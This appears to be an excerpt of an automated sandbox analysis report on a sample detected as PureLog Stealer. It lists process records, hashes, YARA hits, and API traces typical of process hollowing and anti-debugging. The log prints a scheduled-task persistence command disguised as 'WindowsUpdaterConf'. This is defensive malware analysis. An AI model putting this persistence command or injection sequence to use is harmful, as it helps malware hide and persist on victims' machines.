                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsUpdaterConf" /tr "C:\Users\user\WindowsUpdaterConf.exe"
                                                                                        Imagebase:0xa0000
                                                                                        File size:187'904 bytes
                                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:26
                                                                                        Start time:13:40:32
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:27
                                                                                        Start time:13:40:33
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Users\user\WindowsUpdaterConf.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\user\WindowsUpdaterConf.exe
                                                                                        Imagebase:0x360000
                                                                                        File size:3'507'712 bytes
                                                                                        MD5 hash:7823E902900881094372948957825FE1
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\WindowsUpdaterConf.exe, Author: Joe Security
                                                                                        Antivirus matches:
                                                                                        • Detection: 47%, ReversingLabs
                                                                                        Has exited:true

                                                                                        Target ID:29
                                                                                        Start time:13:40:39
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5960 -s 1204
                                                                                        Imagebase:0xd50000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:30
                                                                                        Start time:13:40:41
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Users\user\WindowsUpdaterConf.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\WindowsUpdaterConf.exe"
                                                                                        Imagebase:0xb60000
                                                                                        File size:3'507'712 bytes
                                                                                        MD5 hash:7823E902900881094372948957825FE1
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:31
                                                                                        Start time:13:40:47
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 6184 -ip 6184
                                                                                        Imagebase:0xd50000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:32
                                                                                        Start time:13:40:47
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6184 -s 1144
                                                                                        Imagebase:0xd50000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:33
                                                                                        Start time:13:40:49
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Users\user\WindowsUpdaterConf.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\WindowsUpdaterConf.exe"
                                                                                        Imagebase:0xf30000
                                                                                        File size:3'507'712 bytes
                                                                                        MD5 hash:7823E902900881094372948957825FE1
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:35
                                                                                        Start time:13:40:55
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4040 -s 1164
                                                                                        Imagebase:0xd50000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:37
                                                                                        Start time:13:42:00
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Users\user\WindowsUpdaterConf.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\user\WindowsUpdaterConf.exe
                                                                                        Imagebase:0xcd0000
                                                                                        File size:3'507'712 bytes
                                                                                        MD5 hash:7823E902900881094372948957825FE1
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:39
                                                                                        Start time:13:42:06
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 1148
                                                                                        Imagebase:0xd50000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:40
                                                                                        Start time:13:43:00
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Users\user\WindowsUpdaterConf.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\user\WindowsUpdaterConf.exe
                                                                                        Imagebase:0xb30000
                                                                                        File size:3'507'712 bytes
                                                                                        MD5 hash:7823E902900881094372948957825FE1
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:42
                                                                                        Start time:13:43:06
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6024 -s 1132
                                                                                        Imagebase:0xd50000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:43
                                                                                        Start time:13:44:00
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Users\user\WindowsUpdaterConf.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\user\WindowsUpdaterConf.exe
                                                                                        Imagebase:0xa80000
                                                                                        File size:3'507'712 bytes
                                                                                        MD5 hash:7823E902900881094372948957825FE1
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000002B.00000002.4172310149.00000000042F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Has exited:false


                                                                                          Execution Graph

                                                                                          Execution Coverage:16.1%
                                                                                          Dynamic/Decrypted Code Coverage:97.5%
                                                                                          Signature Coverage:6.6%
                                                                                          Total number of Nodes:121
                                                                                          Total number of Limit Nodes:2

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 0 6288c18-6288c83 call 6280040 call 628bf28 6 6288c89-628bec4 0->6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: %1K$(K1$9Gxv$9Gxv$=<R3${u(F$C\
                                                                                          • API String ID: 0-857792947
                                                                                          • Opcode ID: a433b7d98ec2ca38daef03b23a5cd4adaeb49823cc0b7f10aad33d0a95a5df57
                                                                                          • Instruction ID: 9fe229cbca76f1fd52953f32946e4c2e7f7f3ba31bfa866d2a6be7c7e3385a63
                                                                                          • Opcode Fuzzy Hash: a433b7d98ec2ca38daef03b23a5cd4adaeb49823cc0b7f10aad33d0a95a5df57
                                                                                          • Instruction Fuzzy Hash: A6532B38A012198FCB54EF68D99969AB7F2FB99301F1081E9D909E7344DB349F85CF81

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1754219747.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_31c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$TJkq$Tefq$pjq$xbiq
                                                                                          • API String ID: 0-2688501482
                                                                                          • Opcode ID: 9a55369b938433ba48f17b21e3200a77afe636d8c5b3df70b4c404537cef38aa
                                                                                          • Instruction ID: a99a13d6d935697de8d76e53f22920c0d58ab43a1475843892a6966db3cc8a2a
                                                                                          • Opcode Fuzzy Hash: 9a55369b938433ba48f17b21e3200a77afe636d8c5b3df70b4c404537cef38aa
                                                                                          • Instruction Fuzzy Hash: 34523775A10224DFCB55DFA8C984E9DBBB2FF48310F1581A8E509AB262CB31ED91DF40

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$TJkq$Tefq$pjq$xbiq
                                                                                          • API String ID: 0-2688501482
                                                                                          • Opcode ID: 2f5489dcc15b3b668029389aa0ca63a705f4546bcfd33c503c41c3c173e3b6e1
                                                                                          • Instruction ID: b838731d525c93e43f0e7311eca597a72a00f00b7a782d381b8767992b3b64ca
                                                                                          • Opcode Fuzzy Hash: 2f5489dcc15b3b668029389aa0ca63a705f4546bcfd33c503c41c3c173e3b6e1
                                                                                          • Instruction Fuzzy Hash: 75524875A11214DFDB55DFA8CD84E98BBB2FF48300F558198E909AB2A2CB35EC91CF50

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 061C2E7F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760432669.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_61c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CheckDebuggerPresentRemote
                                                                                          • String ID:
                                                                                          • API String ID: 3662101638-0
                                                                                          • Opcode ID: bb70496e8f0d45808ad4bd909019cbca9ac645441e5df62c3ec03d3b650eec04
                                                                                          • Instruction ID: b4b001cd657d28168eb300246d91b715601865391c0281e5766de1c101c1ef5e
                                                                                          • Opcode Fuzzy Hash: bb70496e8f0d45808ad4bd909019cbca9ac645441e5df62c3ec03d3b650eec04
                                                                                          • Instruction Fuzzy Hash: 1B2128B1D002598FCB10CF9AD884BEEBBF4AF58320F14845AE459B7250D778A944CF61
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760432669.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_61c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: \VVm
                                                                                          • API String ID: 0-390912563
                                                                                          • Opcode ID: 0a2a686501ae83bc50213036a6d70e3a8e73a99240ac0ed54287f4966f6a9044
                                                                                          • Instruction ID: 3ded73c9e14fae106836d5ea567a6ad6c94fa4964ebf07f1544cebec52d77370
                                                                                          • Opcode Fuzzy Hash: 0a2a686501ae83bc50213036a6d70e3a8e73a99240ac0ed54287f4966f6a9044
                                                                                          • Instruction Fuzzy Hash: 51B17D70E40209DFDB54CFA9C8867EDBBF2AF98324F14852DE815E7295EB349845CB81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760432669.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_61c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: feabc9c9c5f46adf424039b757fac4548b8faece7bf44a6c6f5b8d2077f50923
                                                                                          • Instruction ID: 0c8d25eb32d2e4e60434537089efc13be4c1d549e8b6b1cbce944c544aaf23ec
                                                                                          • Opcode Fuzzy Hash: feabc9c9c5f46adf424039b757fac4548b8faece7bf44a6c6f5b8d2077f50923
                                                                                          • Instruction Fuzzy Hash: 74D11078B111488FCB84FB68FD9566D7BF2EF94311F209569A816AB394DB346D01CF80
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760432669.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_61c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b461ccf7c013bdc7f90bfce8ae73630b8213efb53172f5a321e0012f789300e4
                                                                                          • Instruction ID: 50790b7b422e192f62ce0e3794e38b13718d5033f7bffde79f5961c39ba3f1bd
                                                                                          • Opcode Fuzzy Hash: b461ccf7c013bdc7f90bfce8ae73630b8213efb53172f5a321e0012f789300e4
                                                                                          • Instruction Fuzzy Hash: 79D1FE78B111488FCB84FBA9FD9566E77F2EF94211F209529A816AB394DF346D01CF80
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760432669.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_61c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 507bc9c2d394c2de50a3ac18a95b545bd63957d651f8a6696e67caf1d2f03840
                                                                                          • Instruction ID: d4a76efa3c2dfddb0cd1d144ac8b0ffbd937970b2799306e6855efbee77b109a
                                                                                          • Opcode Fuzzy Hash: 507bc9c2d394c2de50a3ac18a95b545bd63957d651f8a6696e67caf1d2f03840
                                                                                          • Instruction Fuzzy Hash: 3BB15A70E002098FDB54CFA8C9917EEBBF2AF98324F14852DD815A7298EB749945CB91

                                                                                          Control-flow Graph

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: PHfq$`Qfq$`Qfq
                                                                                          • API String ID: 0-872445281
                                                                                          • Opcode ID: cb5ff0183b4d567a59e17b17a7eeceaded7cb3905f4aa633e69beb789a5eda10
                                                                                          • Instruction ID: 440bb4ea05e497233cd40ec7a95d883145ca293e57c802621d1b0b4154081d1d
                                                                                          • Opcode Fuzzy Hash: cb5ff0183b4d567a59e17b17a7eeceaded7cb3905f4aa633e69beb789a5eda10
                                                                                          • Instruction Fuzzy Hash: 1C515770A1131ACFEB65AF68D8547ADBBB1FB44300F104099E90AA7388DB745F82CF41

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 061C58A6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760432669.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_61c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateProcess
                                                                                          • String ID:
                                                                                          • API String ID: 963392458-0
                                                                                          • Opcode ID: db29d6a9c7bc0d4adcefdde992ccae01b4af574a5b282e7b1a24a9bc016875fd
                                                                                          • Instruction ID: 19a74daa59e8f545c4400246dddb9b7fbcf0f936279e5de381c5dbd79cc7afe3
                                                                                          • Opcode Fuzzy Hash: db29d6a9c7bc0d4adcefdde992ccae01b4af574a5b282e7b1a24a9bc016875fd
                                                                                          • Instruction Fuzzy Hash: 87A16CB1D00319CFDB60CFA8C841BEDBBB2AF58320F1485A9D818A7240DB74A995DF91

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 061C58A6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760432669.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_61c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateProcess
                                                                                          • String ID:
                                                                                          • API String ID: 963392458-0
                                                                                          • Opcode ID: ae4552b5af0e58d17df861c7b500b89dc285aad2ac92f51448733b39714f57e5
                                                                                          • Instruction ID: 022ca22df0bdeaf61f1afeec24c4bce951196c0dff966960762f04dec57ab8ed
                                                                                          • Opcode Fuzzy Hash: ae4552b5af0e58d17df861c7b500b89dc285aad2ac92f51448733b39714f57e5
                                                                                          • Instruction Fuzzy Hash: C8915AB1D00319CFDB60CFA9C841BEDBBB2EF58320F1485A9D818A7240DB74A995DF91

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 061C51BE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760432669.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_61c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ContextThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 983334009-0
                                                                                          • Opcode ID: 64c51caa5467b53d4b7d11f3f79fdcf4fb8e3643d54724ed6cf2cbd3530ce27a
                                                                                          • Instruction ID: ce3d8a9814b631fe4dee630e2a31d9e0b13f5aa71447a28cb027005a230d7223
                                                                                          • Opcode Fuzzy Hash: 64c51caa5467b53d4b7d11f3f79fdcf4fb8e3643d54724ed6cf2cbd3530ce27a
                                                                                          • Instruction Fuzzy Hash: 1531ABB2D043498FCB11CFA9C9857EEBFF4EF49320F14846AD558AB241DB34A944CBA1

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 061C5410
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760432669.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_61c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3559483778-0
                                                                                          • Opcode ID: 84c961b44eb689f6f47fbe6243f485c03a88204c178ebc5807093afba45c4d64
                                                                                          • Instruction ID: 7333f269d08f0198a29d66d6ff111ce449f011a11b26613c1da2f7ccc0158a11
                                                                                          • Opcode Fuzzy Hash: 84c961b44eb689f6f47fbe6243f485c03a88204c178ebc5807093afba45c4d64
                                                                                          • Instruction Fuzzy Hash: 49212AB1D103099FCB10CFA9C881BDEBBF5FF48320F108429E519A7240D778A550DB61

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 061C5410
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760432669.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_61c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3559483778-0
                                                                                          • Opcode ID: 6177dcab0babd846c4cf46cd66002810a820f78219035699f1d32190e052ec65
                                                                                          • Instruction ID: f6c130edd2c4bf9b9a7fb01b4d04d3ea01227cd3692adb2f0822ce73f9eb5430
                                                                                          • Opcode Fuzzy Hash: 6177dcab0babd846c4cf46cd66002810a820f78219035699f1d32190e052ec65
                                                                                          • Instruction Fuzzy Hash: 532125B5D103099FCB10CFA9C981BEEBBF5FF48320F10842AE919A7240D778A950DB61

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 061C2E7F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760432669.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_61c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CheckDebuggerPresentRemote
                                                                                          • String ID:
                                                                                          • API String ID: 3662101638-0

                                                                                          Control-flow Graph
                                                                                          control_flow_graph 1151 61c50e8-61c50f4 1152 61c516c-61c518b 1151->1152 1153 61c50f6-61c5106 1151->1153 1156 61c518d-61c5199 1152->1156 1157 61c519b-61c51cb Wow64SetThreadContext 1152->1157 1154 61c510b-61c510c 1153->1154 1156->1157 1159 61c51cd-61c51d3 1157->1159 1160 61c51d4-61c5204 1157->1160 1159->1160
                                                                                          APIs
                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 061C51BE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760432669.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_61c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ContextThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 983334009-0

                                                                                          Control-flow Graph
                                                                                          control_flow_graph 1164 61c5140-61c518b 1167 61c518d-61c5199 1164->1167 1168 61c519b-61c51cb Wow64SetThreadContext 1164->1168 1167->1168 1170 61c51cd-61c51d3 1168->1170 1171 61c51d4-61c5204 1168->1171 1170->1171
                                                                                          APIs
                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 061C51BE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760432669.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_61c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ContextThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 983334009-0
                                                                                          APIs
                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 061C530E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760432669.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_61c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          APIs
                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 031C89E4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1754219747.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_31c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 544645111-0
                                                                                          APIs
                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 061C530E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760432669.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_61c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Dmq
                                                                                          • API String ID: 0-4031372824
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1754219747.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_31c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandle
                                                                                          • String ID:
                                                                                          • API String ID: 2962429428-0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode Fuzzy Hash: fe7a9fb969c3eb1496e58fac5fff2b26ffe66b659351c36dddc41484e7073c48
                                                                                          • Instruction Fuzzy Hash: 6CC0C9748256558EEB806B68C16538AB7A4FB50300B4000F29C298A116CA7446059B82
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
                                                                                          • Instruction ID: 19d07928bc24b9474f7e59cbdd8b8e0d3deed1c7a519eb3c8c8690cf2c067a2b
                                                                                          • Opcode Fuzzy Hash: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
                                                                                          • Instruction Fuzzy Hash: C5C092303082084B8748D69DE851825F3DA9BCC618328C0BDA80DC7352EE23FC038684
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2ca68130dbc0fe7df2f6cbd08cf44a7b423d963cc1ee73d3693226bcb467b0b6
                                                                                          • Instruction ID: d45b4276c3d9d73b8522ed91c4ceee6d449521a6169578b73b8b37612b4ed095
                                                                                          • Opcode Fuzzy Hash: 2ca68130dbc0fe7df2f6cbd08cf44a7b423d963cc1ee73d3693226bcb467b0b6
                                                                                          • Instruction Fuzzy Hash: F7C02B3021010CC3D305365CF45C05A338EE3C9B04F410010D50543341CD24BF018B93
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
